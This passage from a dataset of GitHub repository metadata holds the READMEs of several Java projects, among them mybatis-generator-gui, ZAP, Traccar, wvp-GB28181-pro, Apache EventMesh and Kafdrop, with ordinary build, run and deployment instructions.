git clone https://github.com/zouzg/mybatis-generator-gui
cd mybatis-generator-gui
mvn jfx:jar
cd target/jfx/app/
java -jar mybatis-generator-gui.jar
```
* 方法三: IDE中运行
Eclipse or IntelliJ IDEA中启动, 找到`com.zzg.mybatis.generator.MainUI`类并运行就可以了(主要你的IED运行的jdk版本是否符合要求)
* 方法四:打包为本地原生应用,双击快捷方式即可启动,方便快捷
如果不想打包后的安装包logo为Java的灰色的茶杯,需要在pom文件里将对应操作系统平台的图标注释放开
```bash
#${project.basedir}/package/windows/mybatis-generator-gui.ico为windows
#${project.basedir}/package/macosx/mybatis-generator-gui.icns为mac
mvn jfx:native
```
另外需要注意,windows系统打包成exe的话需要安装WiXToolset3+的环境;由于打包后会把jre打入安装包,两个平台均100M左右,体积较大请自行打包;打包后的安装包在target/jfx/native目录下
### 注意事项
* 本自动生成代码工具只适合生成单表的增删改查,对于需要做数据库联合查询的,请自行写新的XML与Mapper;
* 部分系统在中文输入方法时输入框中无法输入文字,请切换成英文输入法;
* 如果不明白对应字段或选项是什么意思的时候,把光标放在对应字段或Label上停留一会然后如果有解释会出现解释;
### 文档
更多详细文档请参考本库的Wiki
* [Usage](https://github.com/astarring/mybatis-generator-gui/wiki/Usage-Guide)
### 贡献
目前本工具只是本人项目人使用到了并且觉得非常有用所以把它开源,如果你觉得有用并且想改进本软件,你可以:
* 对于你认为有用的功能,你可以在Issue提,我可以开发的尽量满足
* 对于有Bug的地方,请按如下方式在Issue中提bug
* 如何重现你的bug,包括你使用的系统,JDK版本,数据库类型及版本
* 如果有任何的错误截图会更好
* 如果你是一些常见的数据库连接、软件启动不了等问题,请先仔细阅读上面的文档,再解决不了在下面的QQ群中问(问问题的时候尽量把各种信息都提供好,否则只是几行文字是没有人愿意为你解答的)。
### QQ群
鉴于有的同学可能有一些特殊情况不能使用,我建了一个钉钉群供大家交流,钉钉群号:35412531 (原QQ群已不再提供,QQ不方便打开)
- - -
Licensed under the Apache 2.0 License
Copyright 2017 by Owen Zou
"
apache/cassandra,trunk,8509,3537,2009-05-21T02:10:09Z,429171,474,Mirror of Apache Cassandra,cassandra database java,
zaproxy/zaproxy,main,11967,2189,2015-06-03T16:55:01Z,196935,810,The ZAP core project,appsec dast hacktoberfest security security-scanner zap zap-development zaproxy,"# [![](https://raw.githubusercontent.com/wiki/zaproxy/zaproxy/images/zap32x32.png) ZAP](https://www.zaproxy.org)
[![License](https://img.shields.io/badge/license-Apache%202-4EB1BA.svg)](https://www.apache.org/licenses/LICENSE-2.0.html)
[![GitHub release](https://img.shields.io/github/release/zaproxy/zaproxy.svg)](https://www.zaproxy.org/download/)
[![Java CI](https://github.com/zaproxy/zaproxy/actions/workflows/ci.yml/badge.svg)](https://github.com/zaproxy/zaproxy/actions/workflows/ci.yml)
[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/24/badge)](https://bestpractices.coreinfrastructure.org/projects/24)
[![Github Releases](https://img.shields.io/github/downloads/zaproxy/zaproxy/latest/total.svg?maxAge=2592000)](https://zapbot.github.io/zap-mgmt-scripts/downloads.html)
[![javadoc](https://javadoc.io/badge2/org.zaproxy/zap/javadoc.svg)](https://javadoc.io/doc/org.zaproxy/zap)
[![CodeQL](https://github.com/zaproxy/zaproxy/actions/workflows/codeql.yml/badge.svg)](https://github.com/zaproxy/zaproxy/actions/workflows/codeql.yml)
[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=zaproxy_zaproxy&metric=alert_status)](https://sonarcloud.io/dashboard?id=zaproxy_zaproxy)
[![Open Source Helpers](https://www.codetriage.com/zaproxy/zaproxy/badges/users.svg)](https://www.codetriage.com/zaproxy/zaproxy)
[![Twitter Follow](https://img.shields.io/twitter/follow/zaproxy.svg?style=social&label=Follow&maxAge=2592000)](https://twitter.com/zaproxy)
![Integration Tests](https://github.com/zaproxy/zaproxy/actions/workflows/run-integration-tests.yml/badge.svg)
![Docker Live Release](https://github.com/zaproxy/zaproxy/actions/workflows/release-live-docker.yml/badge.svg)
The Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by a dedicated international team of volunteers. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications. It's also a great tool for experienced pentesters to use for manual security testing.
[![](https://raw.githubusercontent.com/wiki/zaproxy/zaproxy/images/ZAP-Download.png)](https://www.zaproxy.org/download/)
For more details about ZAP see the new ZAP website at [zaproxy.org](https://www.zaproxy.org/)
[![](https://raw.githubusercontent.com/wiki/zaproxy/zaproxy/images/zap-website.png)](https://www.zaproxy.org/)
"
traccar/traccar,master,4784,2454,2012-04-16T08:33:49Z,22190,476,Traccar GPS Tracking System,gps gps-tracking hacktoberfest java traccar,"# [Traccar](https://www.traccar.org)
## Overview
Traccar is an open source GPS tracking system. This repository contains Java-based back-end service. It supports more than 200 GPS protocols and more than 2000 models of GPS tracking devices. Traccar can be used with any major SQL database system. It also provides easy to use [REST API](https://www.traccar.org/traccar-api/).
Other parts of Traccar solution include:
- [Traccar web app](https://github.com/traccar/traccar-web)
- [Traccar Manager Android app](https://github.com/traccar/traccar-manager-android)
- [Traccar Manager iOS app](https://github.com/traccar/traccar-manager-ios)
There is also a set of mobile apps that you can use for tracking mobile devices:
- [Traccar Client Android app](https://github.com/traccar/traccar-client-android)
- [Traccar Client iOS app](https://github.com/traccar/traccar-client-ios)
## Features
Some of the available features include:
- Real-time GPS tracking
- Driver behaviour monitoring
- Detailed and summary reports
- Geofencing functionality
- Alarms and notifications
- Account and device management
- Email and SMS support
## Build
Please read [build from source documentation](https://www.traccar.org/build/) on the official website.
## Team
- Anton Tananaev ([anton@traccar.org](mailto:anton@traccar.org))
- Andrey Kunitsyn ([andrey@traccar.org](mailto:andrey@traccar.org))
## License
Apache License, Version 2.0
Licensed under the Apache License, Version 2.0 (the ""License"");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an ""AS IS"" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"
648540858/wvp-GB28181-pro,master,4343,1324,2020-11-14T14:16:37Z,43910,67,WEB VIDEO PLATFORM是一个基于GB28181-2016标准实现的网络视频平台,支持NAT穿透,支持海康、大华、宇视等品牌的IPC、NVR、DVR接入。支持国标级联,支持rtsp/rtmp等视频流转发到国标平台,支持rtsp/rtmp等推流转发到国标平台。,28181 28181web gb28181 gb28181server wvp,"![logo](doc/_media/logo.png)
# 开箱即用的28181协议视频平台
[![Build Status](https://travis-ci.org/xia-chu/ZLMediaKit.svg?branch=master)](https://travis-ci.org/xia-chu/ZLMediaKit)
[![license](http://img.shields.io/badge/license-MIT-green.svg)](https://github.com/xia-chu/ZLMediaKit/blob/master/LICENSE)
[![JAVA](https://img.shields.io/badge/language-java-red.svg)](https://en.cppreference.com/)
[![platform](https://img.shields.io/badge/platform-linux%20|%20macos%20|%20windows-blue.svg)](https://github.com/xia-chu/ZLMediaKit)
[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-yellow.svg)](https://github.com/xia-chu/ZLMediaKit/pulls)
WEB VIDEO PLATFORM是一个基于GB28181-2016标准实现的开箱即用的网络视频平台,负责实现核心信令与设备管理后台部分,支持NAT穿透,支持海康、大华、宇视等品牌的IPC、NVR接入。支持国标级联,支持将不带国标功能的摄像机/直播流/直播推流转发到其他国标平台。
流媒体服务基于@夏楚 ZLMediaKit [https://github.com/ZLMediaKit/ZLMediaKit](https://github.com/ZLMediaKit/ZLMediaKit)
播放器使用@dexter jessibuca [https://github.com/langhuihui/jessibuca/tree/v3](https://github.com/langhuihui/jessibuca/tree/v3)
前端页面基于@Kyle MediaServerUI [https://gitee.com/kkkkk5G/MediaServerUI](https://gitee.com/kkkkk5G/MediaServerUI) 进行修改.
# 应用场景:
支持浏览器无插件播放摄像头视频。
支持国标设备(摄像机、平台、NVR等)设备接入
支持非国标(onvif, rtsp, rtmp,直播设备等等)设备接入,充分利旧。
支持国标级联。多平台级联。跨网视频预览。
支持跨网网闸平台互联。
# 文档
wvp使用文档 [https://doc.wvp-pro.cn](https://doc.wvp-pro.cn)
ZLM使用文档 [https://github.com/ZLMediaKit/ZLMediaKit](https://github.com/ZLMediaKit/ZLMediaKit)
# 付费社群
[![社群](doc/_media/shequ.png ""shequ"")](https://t.zsxq.com/0d8VAD3Dm)
> 收费是为了提供更好的服务,也是对作者更大的激励。加入星球的用户三天后可以私信我留下微信号,我会拉大家入群。加入三天内不满意可以直接退款,大家不需要有顾虑,来白嫖三天也不是不可以。
# gitee同步仓库
https://gitee.com/pan648540858/wvp-GB28181-pro.git
# 截图
![index](doc/_media/index.png ""index.png"")
![2](doc/_media/2.png ""2.png"")
![3](doc/_media/3.png ""3.png"")
![3-1](doc/_media/3-1.png ""3-1.png"")
![3-2](doc/_media/3-2.png ""3-2.png"")
![3-3](doc/_media/3-3.png ""3-3.png"")
![build_1](https://images.gitee.com/uploads/images/2022/0304/101919_ee5b8c79_1018729.png ""2022-03-04_10-13.png"")
# 功能特性
- [X] 集成web界面
- [X] 兼容性良好
- [X] 支持电子地图,支持接入WGS84和GCJ02两种坐标系,并且自动转化为合适的坐标系进行展示和分发
- [X] 接入设备
- [X] 视频预览
- [X] 支持主码流子码流切换
- [X] 无限制接入路数,能接入多少设备只取决于你的服务器性能
- [X] 云台控制,控制设备转向,拉近,拉远
- [X] 预置位查询,使用与设置
- [X] 查询NVR/IPC上的录像与播放,支持指定时间播放与下载
- [X] 无人观看自动断流,节省流量
- [X] 视频设备信息同步
- [X] 离在线监控
- [X] 支持直接输出RTSP、RTMP、HTTP-FLV、Websocket-FLV、HLS多种协议流地址
- [X] 支持通过一个流地址直接观看摄像头,无需登录以及调用任何接口
- [X] 支持UDP和TCP两种国标信令传输模式
- [X] 支持UDP和TCP两种国标流传输模式
- [X] 支持检索,通道筛选
- [X] 支持通道子目录查询
- [X] 支持过滤音频,防止杂音影响观看
- [X] 支持国标网络校时
- [X] 支持播放H264和H265
- [X] 报警信息处理,支持向前端推送报警信息
- [X] 语音对讲
- [X] 支持订阅与通知方法
- [X] 移动位置订阅
- [X] 移动位置通知处理
- [X] 报警事件订阅
- [X] 报警事件通知处理
- [X] 设备目录订阅
- [X] 设备目录通知处理
- [X] 移动位置查询和显示
- [X] 支持手动添加设备和给设备设置单独的密码
- [X] 支持平台对接接入
- [X] 支持国标级联
- [X] 国标通道向上级联
- [X] WEB添加上级平台
- [X] 注册
- [X] 心跳保活
- [X] 通道选择
- [X] 通道推送
- [X] 点播
- [X] 云台控制
- [X] 平台状态查询
- [X] 平台信息查询
- [X] 平台远程启动
- [X] 每个级联平台可自定义的虚拟目录
- [X] 目录订阅与通知
- [X] 录像查看与播放
- [X] GPS订阅与通知(直播推流)
- [X] 语音对讲
- [X] 支持自动配置ZLM媒体服务, 减少因配置问题所出现的问题;
- [X] 多流媒体节点,自动选择负载最低的节点使用。
- [X] 支持启用udp多端口模式, 提高udp模式下媒体传输性能;
- [X] 支持公网部署;
- [X] 支持wvp与zlm分开部署,提升平台并发能力
- [X] 支持拉流RTSP/RTMP,分发为各种流格式,或者推送到其他国标平台
- [X] 支持推流RTSP/RTMP,分发为各种流格式,或者推送到其他国标平台
- [X] 支持推流鉴权
- [X] 支持接口鉴权
- [X] 云端录像,推流/代理/国标视频均可以录制在云端服务器,支持预览和下载
- [X] 支持打包可执行jar和war
- [X] 支持跨域请求,支持前后端分离部署
- [X] 支持Mysql,Postgresql,金仓等数据库
- [X] 支持Onvif(目前在onvif分支,需要安装onvif服务,服务请在知识星球获取)
# 非开源的内容
- [X] ONVIF设备的接入,支持点播,云台控制,国标级联点播,自动点播。在[知识星球](https://t.zsxq.com/10WAnH2MP)放了试用安装包以及使用教程,没有使用时间限制,需要源码可以星球私信我或者邮箱联系。
- [X] 支持国标28181-2022协议,支持巡航轨迹查询,PTZ精准控制,存储卡格式化,设备软件升级,OSD配置,h265+aac,支持辅码流,录像倒放等。具体的功能列表可在[知识星球](https://t.zsxq.com/18GXkpkqs)查看,需要源码和测试可以在星球私信联系或者发邮件给我
# 授权协议
本项目自有代码使用宽松的MIT协议,在保留版权信息的情况下可以自由应用于各自商用、非商业的项目。 但是本项目也零碎的使用了一些其他的开源代码,在商用的情况下请自行替代或剔除; 由于使用本项目而产生的商业纠纷或侵权行为一概与本项目及开发者无关,请自行承担法律风险。 在使用本项目代码时,也应该在授权协议中同时表明本项目依赖的第三方库的协议
# 技术支持
[知识星球](https://t.zsxq.com/0d8VAD3Dm)专栏列表:,
- [使用入门系列一:WVP-PRO能做什么](https://t.zsxq.com/0dLguVoSp)
有偿技术支持,请发送邮件到648540858@qq.com
# 致谢
感谢作者[夏楚](https://github.com/xia-chu) 提供这么棒的开源流媒体服务框架,并在开发过程中给予支持与帮助。
感谢作者[dexter langhuihui](https://github.com/langhuihui) 开源这么好用的WEB播放器。
感谢作者[Kyle](https://gitee.com/kkkkk5G) 开源了好用的前端页面
感谢各位大佬的赞助以及对项目的指正与帮助。包括但不限于代码贡献、问题反馈、资金捐赠等各种方式的支持!以下排名不分先后:
[lawrencehj](https://github.com/lawrencehj) [Smallwhitepig](https://github.com/Smallwhitepig) [swwhaha](https://github.com/swwheihei)
[hotcoffie](https://github.com/hotcoffie) [xiaomu](https://github.com/nikmu) [TristingChen](https://github.com/TristingChen)
[chenparty](https://github.com/chenparty) [Hotleave](https://github.com/hotleave) [ydwxb](https://github.com/ydwxb)
[ydpd](https://github.com/ydpd) [szy833](https://github.com/szy833) [ydwxb](https://github.com/ydwxb) [Albertzhu666](https://github.com/Albertzhu666)
[mk1990](https://github.com/mk1990) [SaltFish001](https://github.com/SaltFish001)
同时感谢JetBrains对开源项目的支持,本项目使用IntelliJ IDEA开发与调试:
![JetBrains](https://resources.jetbrains.com/storage/products/company/brand/logos/IntelliJ_IDEA_icon.svg?_ga=2.143694769.529214288.1712023294-439039083.1711422571&_gl=1*102dv9n*_ga*NDM5MDM5MDgzLjE3MTE0MjI1NzE.*_ga_9J976DJZ68*MTcxMjEyNjg4NC45LjEuMTcxMjEyNzc2My4zMy4wLjA.)
"
apache/eventmesh,master,1539,614,2019-09-16T03:04:56Z,66016,272,EventMesh is a new generation serverless event middleware for building distributed event-driven applications.,cloud-native cqrs esb event-connector event-driven event-gateway event-governance event-mesh event-sourcing event-streaming hacktoberfest message-bus microservice multi-runtime pubsub serverless serverless-workflow,"
# Apache EventMesh
**Apache EventMesh** is a new generation serverless event middleware for building distributed [event-driven](https://en.wikipedia.org/wiki/Event-driven_architecture) applications.
### EventMesh Architecture
![EventMesh Architecture](resources/eventmesh-architecture-4.png)
### EventMesh Dashboard
![EventMesh Dashboard](resources/dashboard.png)
## Features
Apache EventMesh has a vast amount of features to help users achieve their goals. Let us share with you some of the key features EventMesh has to offer:
- Built around the [CloudEvents](https://cloudevents.io) specification.
- Rapidty extendsible interconnector layer [connectors](https://github.com/apache/eventmesh/tree/master/eventmesh-connectors) using [openConnect](https://github.com/apache/eventmesh/tree/master/eventmesh-openconnect) such as the source or sink of Saas, CloudService, and Database etc.
- Rapidty extendsible storage layer such as [Apache RocketMQ](https://rocketmq.apache.org), [Apache Kafka](https://kafka.apache.org), [Apache Pulsar](https://pulsar.apache.org), [RabbitMQ](https://rabbitmq.com), [Redis](https://redis.io).
- Rapidty extendsible meta such as [Consul](https://consulproject.org/en/), [Nacos](https://nacos.io), [ETCD](https://etcd.io) and [Zookeeper](https://zookeeper.apache.org/).
- Guaranteed at-least-once delivery.
- Deliver events between multiple EventMesh deployments.
- Event schema management by catalog service.
- Powerful event orchestration by [Serverless workflow](https://serverlessworkflow.io/) engine.
- Powerful event filtering and transformation.
- Rapid, seamless scalability.
- Easy Function develop and framework integration.
## Roadmap
Please go to the [roadmap](https://eventmesh.apache.org/docs/roadmap) to get the release history and new features of Apache EventMesh.
## Subprojects
- [EventMesh-site](https://github.com/apache/eventmesh-site): Apache official website resources for EventMesh.
- [EventMesh-workflow](https://github.com/apache/eventmesh-workflow): Serverless workflow runtime for event Orchestration on EventMesh.
- [EventMesh-dashboard](https://github.com/apache/eventmesh-dashboard): Operation and maintenance console of EventMesh.
- [EventMesh-catalog](https://github.com/apache/eventmesh-catalog): Catalog service for event schema management using AsyncAPI.
- [EventMesh-go](https://github.com/apache/eventmesh-go): A go implementation for EventMesh runtime.
## Quick start
This section of the guide will show you the steps to deploy EventMesh from [Local](#run-eventmesh-runtime-locally), [Docker](#run-eventmesh-runtime-in-docker), [K8s](#run-eventmesh-runtime-in-kubernetes).
This section guides the launch of EventMesh according to the default configuration, if you need more detailed EventMesh deployment steps, please visit the [EventMesh official document](https://eventmesh.apache.org/docs/introduction).
### Deployment Event Store
> EventMesh supports [multiple Event Stores](https://eventmesh.apache.org/docs/roadmap#event-store-implementation-status), the default storage mode is `standalone`, and does not rely on other event stores as layers.
### Run EventMesh Runtime locally
#### 1. Download EventMesh
Download the latest version of the Binary Distribution from the [EventMesh Download](https://eventmesh.apache.org/download/) page and extract it:
```shell
wget https://dlcdn.apache.org/eventmesh/1.10.0/apache-eventmesh-1.10.0-bin.tar.gz
tar -xvzf apache-eventmesh-1.10.0-bin.tar.gz
cd apache-eventmesh-1.10.0
```
#### 2. Run EventMesh
Execute the `start.sh` script to start the EventMesh Runtime server.
```shell
bash bin/start.sh
```
View the output log:
```shell
tail -n 50 -f logs/eventmesh.out
```
When the log output shows server `state:RUNNING`, it means EventMesh Runtime has started successfully.
You can stop the run with the following command:
```shell
bash bin/stop.sh
```
When the script prints `shutdown server ok!`, it means EventMesh Runtime has stopped.
### Run EventMesh Runtime in Docker
#### 1. Pull EventMesh Image
Use the following command line to download the latest version of [EventMesh](https://hub.docker.com/r/apache/eventmesh):
```shell
sudo docker pull apache/eventmesh:latest
```
#### 2. Run and Manage EventMesh Container
Use the following command to start the EventMesh container:
```shell
sudo docker run -d --name eventmesh -p 10000:10000 -p 10105:10105 -p 10205:10205 -p 10106:10106 -t apache/eventmesh:latest
```
Enter the container:
```shell
sudo docker exec -it eventmesh /bin/bash
```
view the log:
```shell
cd logs
tail -n 50 -f eventmesh.out
```
### Run EventMesh Runtime in Kubernetes
#### 1. Deploy operator
Run the following commands(To delete a deployment, simply replace `deploy` with `undeploy`):
```shell
$ cd eventmesh-operator && make deploy
```
Run `kubectl get pods` 、`kubectl get crd | grep eventmesh-operator.eventmesh`to see the status of the deployed eventmesh-operator.
```shell
$ kubectl get pods
NAME READY STATUS RESTARTS AGE
eventmesh-operator-59c59f4f7b-nmmlm 1/1 Running 0 20s
$ kubectl get crd | grep eventmesh-operator.eventmesh
connectors.eventmesh-operator.eventmesh 2024-01-10T02:40:27Z
runtimes.eventmesh-operator.eventmesh 2024-01-10T02:40:27Z
```
#### 2. Deploy EventMesh Runtime
Execute the following command to deploy runtime, connector-rocketmq (To delete, simply replace `create` with `delete`):
```shell
$ make create
```
Run `kubectl get pods` to see if the deployment was successful.
```shell
NAME READY STATUS RESTARTS AGE
connector-rocketmq-0 1/1 Running 0 9s
eventmesh-operator-59c59f4f7b-nmmlm 1/1 Running 0 3m12s
eventmesh-runtime-0-a-0 1/1 Running 0 15s
```
## Contributing
Each contributor has played an important role in promoting the robust development of Apache EventMesh. We sincerely appreciate all contributors who have contributed code and documents.
- [Contributing Guideline](https://eventmesh.apache.org/community/contribute/contribute)
- [Good First Issues](https://github.com/apache/eventmesh/issues?q=is%3Aopen+is%3Aissue+label%3A%22good+first+issue%22)
Here is the [List of Contributors](https://github.com/apache/eventmesh/graphs/contributors), thank you all! :)
## CNCF Landscape
## License
Apache EventMesh is licensed under the [Apache License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0.html).
## Community
| WeChat Assistant | WeChat Public Account | Slack |
|---------------------------------------------------------|--------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------|
| | | [Join Slack Chat](https://join.slack.com/t/the-asf/shared_invite/zt-1y375qcox-UW1898e4kZE_pqrNsrBM2g)(Please open an issue if this link is expired) |
Bi-weekly meeting : [#Tencent meeting](https://meeting.tencent.com/dm/wes6Erb9ioVV) : 346-6926-0133
Bi-weekly meeting record : [bilibili](https://space.bilibili.com/1057662180)
### Mailing List
| Name | Description | Subscribe | Unsubscribe | Archive |
|-------------|---------------------------------------------------------|------------------------------------------------------------|----------------------------------------------------------------|----------------------------------------------------------------------------------|
| Users | User discussion | [Subscribe](mailto:users-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:users-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?users@eventmesh.apache.org) |
| Development | Development discussion (Design Documents, Issues, etc.) | [Subscribe](mailto:dev-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:dev-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?dev@eventmesh.apache.org) |
| Commits | Commits to related repositories | [Subscribe](mailto:commits-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:commits-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?commits@eventmesh.apache.org) |
| Issues | Issues or PRs comments and reviews | [Subscribe](mailto:issues-subscribe@eventmesh.apache.org) | [Unsubscribe](mailto:issues-unsubscribe@eventmesh.apache.org) | [Mail Archives](https://lists.apache.org/list.html?issues@eventmesh.apache.org) |
"
obsidiandynamics/kafdrop,master,5171,797,2019-05-27T08:46:56Z,2781,45,Kafka Web UI,consumer-group consumer-producer docker event-sourcing event-streaming kafka kafka-tools kafka-ui kafka-utils kubernetes pub-sub topic web-ui zookeeper," Kafdrop – Kafka Web UI [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?url=https%3A%2F%2Fgithub.com%2Fobsidiandynamics%2Fkafdrop&text=Get%20Kafdrop%20%E2%80%94%20a%20web-based%20UI%20for%20viewing%20%23ApacheKafka%20topics%20and%20browsing%20consumers%20)
===
[![Price](https://img.shields.io/badge/price-FREE-0098f7.svg)](https://github.com/obsidiandynamics/kafdrop/blob/master/LICENSE)
[![Release with mvn](https://github.com/obsidiandynamics/kafdrop/actions/workflows/master.yml/badge.svg)](https://github.com/obsidiandynamics/kafdrop/actions/workflows/master.yml)
[![Docker](https://img.shields.io/docker/pulls/obsidiandynamics/kafdrop.svg)](https://hub.docker.com/r/obsidiandynamics/kafdrop)
[![Language grade: Java](https://img.shields.io/lgtm/grade/java/g/obsidiandynamics/kafdrop.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/obsidiandynamics/kafdrop/context:java)
Kafdrop is a web UI for viewing Kafka topics and browsing consumer groups. The tool displays information such as brokers, topics, partitions, consumers, and lets you view messages.
![Overview Screenshot](docs/images/overview.png?raw=true)
This project is a reboot of Kafdrop 2.x, dragged kicking and screaming into the world of Java 17+, Kafka 2.x, Helm and Kubernetes. It's a lightweight application that runs on Spring Boot and is dead-easy to configure, supporting SASL and TLS-secured brokers.
# Features
* **View Kafka brokers** — topic and partition assignments, and controller status
* **View topics** — partition count, replication status, and custom configuration
* **Browse messages** — JSON, plain text, Avro and Protobuf encoding
* **View consumer groups** — per-partition parked offsets, combined and per-partition lag
* **Create new topics**
* **View ACLs**
* **Support for Azure Event Hubs**
# Requirements
* Java 17 or newer
* Kafka (version 0.11.0 or newer) or Azure Event Hubs
Optional, additional integration:
* Schema Registry
# Getting Started
You can run the Kafdrop JAR directly, via Docker, or in Kubernetes.
## Running from JAR
```sh
java --add-opens=java.base/sun.nio.ch=ALL-UNNAMED \
-jar target/kafdrop-.jar \
--kafka.brokerConnect=,...
```
If unspecified, `kafka.brokerConnect` defaults to `localhost:9092`.
**Note:** As of Kafdrop 3.10.0, a ZooKeeper connection is no longer required. All necessary cluster information is retrieved via the Kafka admin API.
Open a browser and navigate to [http://localhost:9000](http://localhost:9000). The port can be overridden by adding the following config:
```
--server.port= --management.server.port=
```
Optionally, configure a schema registry connection with:
```
--schemaregistry.connect=http://localhost:8081
```
and if you also require basic auth for your schema registry connection you should add:
```
--schemaregistry.auth=username:password
```
Finally, a default message and key format (e.g. to deserialize Avro messages or keys) can optionally be configured as follows:
```
--message.format=AVRO
--message.keyFormat=DEFAULT
```
Valid format values are `DEFAULT`, `AVRO`, `PROTOBUF`. This can also be configured at the topic level via dropdown when viewing messages.
If key format is unspecified, message format will be used for key too.
## Configure Protobuf message type
### Option 1: Using Protobuf Descriptor
In case of protobuf message type, the definition of a message could be compiled and transmitted using a descriptor file.
Thus, in order for kafdrop to recognize the message, the application will need to access to the descriptor file(s).
Kafdrop will allow user to select descriptor and well as specifying name of one of the message type provided by the descriptor at runtime.
To configure a folder with protobuf descriptor file(s) (.desc), follow:
```
--protobufdesc.directory=/var/protobuf_desc
```
### Option 2 : Using Schema Registry
In case of no protobuf descriptor file being supplied the implementation will attempt to create the protobuf deserializer using the schema registry instead.
### Defaulting to Protobuf
If preferred the message type could be set to default as follows:
```
--message.format=PROTOBUF
```
## Running with Docker
Images are hosted at [hub.docker.com/r/obsidiandynamics/kafdrop](https://hub.docker.com/r/obsidiandynamics/kafdrop).
Launch container in background:
```sh
docker run -d --rm -p 9000:9000 \
-e KAFKA_BROKERCONNECT= \
-e SERVER_SERVLET_CONTEXTPATH=""/"" \
obsidiandynamics/kafdrop
```
Launch container with some specific JVM options:
```sh
docker run -d --rm -p 9000:9000 \
-e KAFKA_BROKERCONNECT= \
-e JVM_OPTS=""-Xms32M -Xmx64M"" \
-e SERVER_SERVLET_CONTEXTPATH=""/"" \
obsidiandynamics/kafdrop
```
Launch container in background with protobuff definitions:
```sh
docker run -d --rm -v :/var/protobuf_desc -p 9000:9000 \
-e KAFKA_BROKERCONNECT= \
-e SERVER_SERVLET_CONTEXTPATH=""/"" \
-e CMD_ARGS=""--message.format=PROTOBUF --protobufdesc.directory=/var/protobuf_desc"" \
obsidiandynamics/kafdrop
```
Then access the web UI at [http://localhost:9000](http://localhost:9000).
> **Hey there!** We hope you really like Kafdrop! Please take a moment to [⭐](https://github.com/obsidiandynamics/kafdrop)the repo or [Tweet](https://twitter.com/intent/tweet?url=https%3A%2F%2Fgithub.com%2Fobsidiandynamics%2Fkafdrop&text=Get%20Kafdrop%20%E2%80%94%20a%20web-based%20UI%20for%20viewing%20%23ApacheKafka%20topics%20and%20browsing%20consumers%20) about it.
## Running in Kubernetes (using a Helm Chart)
Clone the repository (if necessary):
```sh
git clone https://github.com/obsidiandynamics/kafdrop && cd kafdrop
```
Apply the chart:
```sh
helm upgrade -i kafdrop chart --set image.tag=3.x.x \
--set kafka.brokerConnect= \
--set server.servlet.contextPath=""/"" \
--set cmdArgs=""--message.format=AVRO --schemaregistry.connect=http://localhost:8080"" \ #optional
--set jvm.opts=""-Xms32M -Xmx64M""
```
For all Helm configuration options, have a peek into [chart/values.yaml](chart/values.yaml).
Replace `3.x.x` with the image tag of [obsidiandynamics/kafdrop](https://hub.docker.com/r/obsidiandynamics/kafdrop). Services will be bound on port 9000 by default (node port 30900).
**Note:** The context path _must_ begin with a slash.
Proxy to the Kubernetes cluster:
```sh
kubectl proxy
```
Navigate to [http://localhost:8001/api/v1/namespaces/default/services/http:kafdrop:9000/proxy](http://localhost:8001/api/v1/namespaces/default/services/http:kafdrop:9000/proxy).
### Protobuf support via helm chart:
To install with protobuf support, a ""facility"" option is provided for the deployment, to mount the descriptor files folder, as well as passing the required CMD arguments, via option _mountProtoDesc_.
Example:
```sh
helm upgrade -i kafdrop chart --set image.tag=3.x.x \
--set kafka.brokerConnect= \
--set server.servlet.contextPath=""/"" \
--set mountProtoDesc.enabled=true \
--set mountProtoDesc.hostPath="""" \
--set jvm.opts=""-Xms32M -Xmx64M""
```
## Building
After cloning the repository, building is just a matter of running a standard Maven build:
```sh
$ mvn clean package
```
The following command will generate a Docker image:
```sh
mvn assembly:single docker:build
```
## Docker Compose
There is a `docker-compose.yaml` file that bundles a Kafka/ZooKeeper instance with Kafdrop:
```sh
cd docker-compose/kafka-kafdrop
docker-compose up
```
# APIs
## JSON endpoints
Starting with version 2.0.0, Kafdrop offers a set of Kafka APIs that mirror the existing HTML views. Any existing endpoint can be returned as JSON by simply setting the `Accept: application/json` header. Some endpoints are JSON only:
* `/topic`: Returns a list of all topics.
## OpenAPI Specification (OAS)
To help document the Kafka APIs, OpenAPI Specification (OAS) has been included. The OpenAPI Specification output is available by default at the following Kafdrop URL:
```
/v3/api-docs
```
It is also possible to access the Swagger UI (the HTML views) from the following URL:
```
/swagger-ui.html
```
This can be overridden with the following configuration:
```
springdoc.api-docs.path=/new/oas/path
```
You can disable OpenAPI Specification output with the following configuration:
```
springdoc.api-docs.enabled=false
```
## CORS Headers
Starting in version 2.0.0, Kafdrop sets CORS headers for all endpoints. You can control the CORS header values with the following configurations:
```
cors.allowOrigins (default is *)
cors.allowMethods (default is GET,POST,PUT,DELETE)
cors.maxAge (default is 3600)
cors.allowCredentials (default is true)
cors.allowHeaders (default is Origin,Accept,X-Requested-With,Content-Type,Access-Control-Request-Method,Access-Control-Request-Headers,Authorization)
```
You can also disable CORS entirely with the following configuration:
```
cors.enabled=false
```
## Topic Configuration
By default, you could delete a topic. If you don't want this feature, you could disable it with:
```
--topic.deleteEnabled=false
```
By default, you could create a topic. If you don't want this feature, you could disable it with:
```
--topic.createEnabled=false
```
## Actuator
Health and info endpoints are available at the following path: `/actuator`
This can be overridden with the following configuration:
```
management.endpoints.web.base-path=
```
# Guides
## Connecting to a Secure Broker
Kafdrop supports TLS (SSL) and SASL connections for [encryption and authentication](http://kafka.apache.org/090/documentation.html#security). This can be configured by providing a combination of the following files (placed into the Kafka root directory):
